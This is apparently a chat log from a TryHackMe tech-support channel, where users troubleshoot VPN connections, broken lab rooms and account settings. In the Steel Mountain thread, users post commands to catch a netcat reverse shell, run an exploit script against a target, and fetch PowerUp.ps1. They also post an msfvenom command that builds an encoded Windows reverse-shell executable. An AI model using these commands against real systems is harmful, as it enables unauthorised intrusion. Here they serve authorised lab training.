oh it loaded now thanks

Guys I can't get a connection from any of the thm machines.
Reverse shells even grabbing stuff from the python webserver

Nothing at all

Noope

Kali is dual-booted with my windows

Never mind
I remembered installing the ufw package while doing one of the rooms on the red teaming path

I just allowed the port now

Thanks for the help tho @gray loom

Gave +1 Rep to @gray loom

I was doing Red Team path, Completed 3 rooms, But then completing "Learn & win prizes - Fall 2022" All my previous tickets are not showing

I have the same problem :C

@torn citrus my friend has same problem as @novel forum

@tawdry orbit

@zealous yoke

@sand olive

@bronze vale there is an oopsie it seems

Please don't spam ping people, especially has everyone you have pinged can't do anything to help you

We're investigating thanks for the ping:)

Gave +1 Rep to @sand olive

ait

https://tryhackme.com/p/TheLinuxBoy

mine friend

that has this problem

privescplayground - Any plan on getting the room online again?

same with me, all my tickets are not showing

Hi lads, is there anyway I can change my account country, and the username? I believe I have registered while accessing VPN thus basing my account in a different country ;-;

Thank you @gray loom !

Gave +1 Rep to @gray loom

Hi, I'm trying to install a fresh Kali Linux on VMware workstation pro 16. On bootup, the screen turns black. I think I've narrowed the issue down to the light display manager and a greeter that has failed to start but I don't know how to further solve the issue. Any and all help would be appreciated!

Also forgot to mention that when I try to install the drivers I get either a package not found or command not found error using apt-get apt install etc.

The target websites load incredibly slowly through the vip vpn, mainly because they fetch assets from outside of the network and it's slow. Can I speed this up somehow?

Turns out this can be accessed without the vpn too

Then why is it horribly slow to load when the VPN is enabled? Or is the VPN so overloaded that not even a couple of kb can get through? I'm trying https://10-10-105-43.p.thmlabs.com/level1 and the first load goes somewhat fine through, but when I enter something in the field that takes minutes to load when the VPN is on, but less than a second when I turn the VPN off

That is equally slow through the VPN, at least I can access it through that domain without the VPN

I download the file from the website and enter it to the kali ethernet connection menu on top of the screen, then connect to the vpn

oh, okay

alright, will do that. Thanks!

Yes that works way better

Hello, please I am working on the adventofcyber3 room and I am on day 2 and unable to create an account in the website

The error you are getting is intended to be like that 🙂

oh really

thanks

Hi, anyone else on US-West-VIP-1 VPN experiencing latency with reaching boxes? I'm doing a Xmas scan on a box for the Offensive Sec Brainstorm room, and it says it'll take 2 hours to complete the scan roughly. I've tried stopping the machine and starting a new one.

Also, it's possible packets are being dropped, since I was getting inconsistent results with nmap and rustscan.

Posted here a couple days ago about Steel Mountain task 4. I am still getting the GET /nc.exe on my python server, but no callback from netcat

I even chmod +x the nc.exe and got it from the location on github that THM recommended

can anyone else please try this room and see if they get the same thing as me so I can just move on and skip this?

I would appreciate it

sudo python3 -m http.server 80

is what I used

sudo nc -lvnp 1234

then netcat on my machine

sudo python exploit.py <target IP> 8080

then I ran this twice

still no dice

Ive tried many different ports other than 1234. Tried 443, 445, 4455, 4456, 4444, and 4446, maybe a couple more

the room requires u to download nc.exe or have u looked into any write up?

yeah, I have three writeups open right now, all of them did the same thing as me, just used different ports for nc callback

i downloaded nc.exe from the provided link on the room page on THM website

u have all this on your kali machine in the same folder yet?

I dont have Adanced.exe or PowerUp.ps1 yet because I'm going straight to w/o metasploit

anyway let's go to #room-help

but I have 39161.py and nc.exe

I was told to post here due to it being a bug with the room.

It was a couple days ago, two users here walked me through it and couldn't figure out the issue.

ahh

can u download powerup.ps1 and generate advanced.exe

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

msfvenom -p windows/shell_reverse_tcp LHOST=youriphere LPORT=4443 -e x86/shikata_ga_nai -f exe -o Advanced.exe

I would, but I'm doing task 4 right now

trying to get the without metasploit portion, and from what I understand powerup.ps1 is only used in task 3

with metasploit

well nevermind, I guess I just had to wait 20 minutes on this server

I guess James S. was right above

ahh alright

I just let the thing sit there forever and now its working.

pretty frustrating

For the purpose of those searching, task 4 of Steel Mountain may require some wait time after the exploit is run for the first time

wait 20 min or so

so it's only require nc.exe from this python script

yeah

did u change ip address in the script?

and the python script to run it

yea

its working now

just took way too long

thanks again

When i was doing it, it didn't take long for me but u're welcome

ifconfig is showing global instead of tun0

can ya copy and paste the output?

ether 3c:95:09:85:cc:dd txqueuelen 1000 (Ethernet)
RX packets 3815635 bytes 4199401304 (3.9 GiB)
RX errors 0 dropped 18 overruns 0 frame 0
TX packets 1788945 bytes 314070905 (299.5 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

ah i mean the full output like this,

eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 3c:52:82:07:c3:20 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1421 bytes 91265 (89.1 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1421 bytes 91265 (89.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.8 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::9e57:c40d:7b6d:6032 prefixlen 64 scopeid 0x20<link>
inet6 fd00:664b:6263:bb00:349:9839:a2a0:685e prefixlen 64 scopeid 0x0<global>
ether 3c:95:09:85:cc:dd txqueuelen 1000 (Ethernet)
RX packets 3822047 bytes 4205868945 (3.9 GiB)
RX errors 0 dropped 18 overruns 0 frame 0
TX packets 1791800 bytes 314626359 (300.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

ok cool so now

restart

the website?

reboot your computer/pc

aah this requires a reboot
i could just shut down and the vpn will go off..
what should i see after restart?

dont shut down

reboot

is the key here

it will clear off any background programs

openvpn in ur case

after that openvpn should work normally

and i need to do it everytime i want to disconnect from it?

no

just for this once

scrubz is here

the next time i want to disconnect from it what shoukd i do?

hi Scrubz

control + c

👋

and if the terminal was already closed ?

either you can kill the session with gui

or with terminal

so i have to redo this and reboot xd

Ctrl and C would be best before closing.

There is a rare case of just closing terminal and the script still running meaning you'll have multiple tun* connections.

aah so i just need to close the terminal after reboot and that's it
and sudo killall openvpn also worked
thanks alot guys 🙂 have a good day

Hey ! I'm in a network who's blocking UDP connection through openvpn, there is a way to force thm.ovpn to use TCP ?

No, you could ask who ever controls the network to unblock UDP 1194.

Otherwise you'll need to use the Attackbox.

@weary spindle Thanks for your reactivitie ❤💪

Gave +1 Rep to @weary spindle

Can somone check the gophish website form the phishing room?

the page looks to be loading for the last 5 minutes and any button i press it wont load

Can you share the ip?

you have to load a machine for it

I can use yours.

oh oki

https://10-10-56-70.p.thmlabs.com:8443/sending_profiles

admin:tryhackme

I can log in via the URL you supplied.

And just by using the ip.

huh

can you go to the sending profiles page and see if you can press the button?

if it loads i mean

press the new profile button

ok wth

ill restart the machine

really weird stuff

idk what causes it to break with my vm

Next machine, try just using the machine ip.

oki

So I accidentally linked my profile to my other discord account

How can I link it in here?

Log to your other account and DM me

Done, it's with the same name

!tokenremove 852767882525540374

Done, no more entry with UID "852767882525540374".

Thanks!

Gave +1 Rep to @crystal marlin

Hi guys can someone explain what's going on here.

Hello someone available

What's up?

No I mean what's the main objective of this channel

This is for Tech support for Tryhackme.

Not to teach about programing or related areas right.

No, they use the website for teaching.

However there is relevant channels you can ask questions in, providing it's not aiding you in an exam, job interview etc.

Okay how can I start hacking course

#start-here

Hi, can I change my username on TryHackME

#site-support message

THanks!

anyone else getting this issue on the new redteam path?

im doing the recon-ng module

i had that too @bitter dirge , but don't remember if i ever solved it

Yeah, ive checked im doing it right

fwiw @bitter dirge i tried the same from my local vm, thinking maybe the attackbox is the cause but i'm still getting the same result. also did some googling and it seems the issue is unresolved

ight thanks chief, just gonna wait

Gave +1 Rep to @potent minnow

as youre going through this

im also stuck on the crunch question

I read a forum and it says you need the ^ for crunch

but im totally stuck

the answer is found here

also, the ' is not used

I'm having issues with RDP in the Runtime Detection Evasion room. Is anyone else having an issue too?

Sometimes I can connect, but then it'll disconnect soon after

in the yara room

Can you confirm that you're in the right path?

Can i get subscription using coupon? if i buy this coupon using my one account and apply it on that account?

u ran --update yet?

not sure if this is the right channel but how do i update my country

i cant find it anywhere on my profile

#general message

thanks!

Gave +1 Rep to @somber spindle

I am getting this error connecting to vpn

i tried generating ovpn files many times but the error remains

update is a command for Loki and i'm not gonna use it since i'm using the attack box

and even if i wanted to

Loki doesn't work to begin with

!vpnscript

try running this

i am only getting on throwback machine else are wroking fine

still

connect to vpn first

its giving me this error when connecting

anyone from @staff ?

Regenerate the VPN profile, wait 60 seconds, download again and try that one. If the certificate is invalid, there isn't much anyone can do to fix that file.

i regenerate it, but still it is showing as invalid i tried this process 5 to 6 times

is there any solution for that

there is only one server in throwback

any other way to contact THM-support?

!email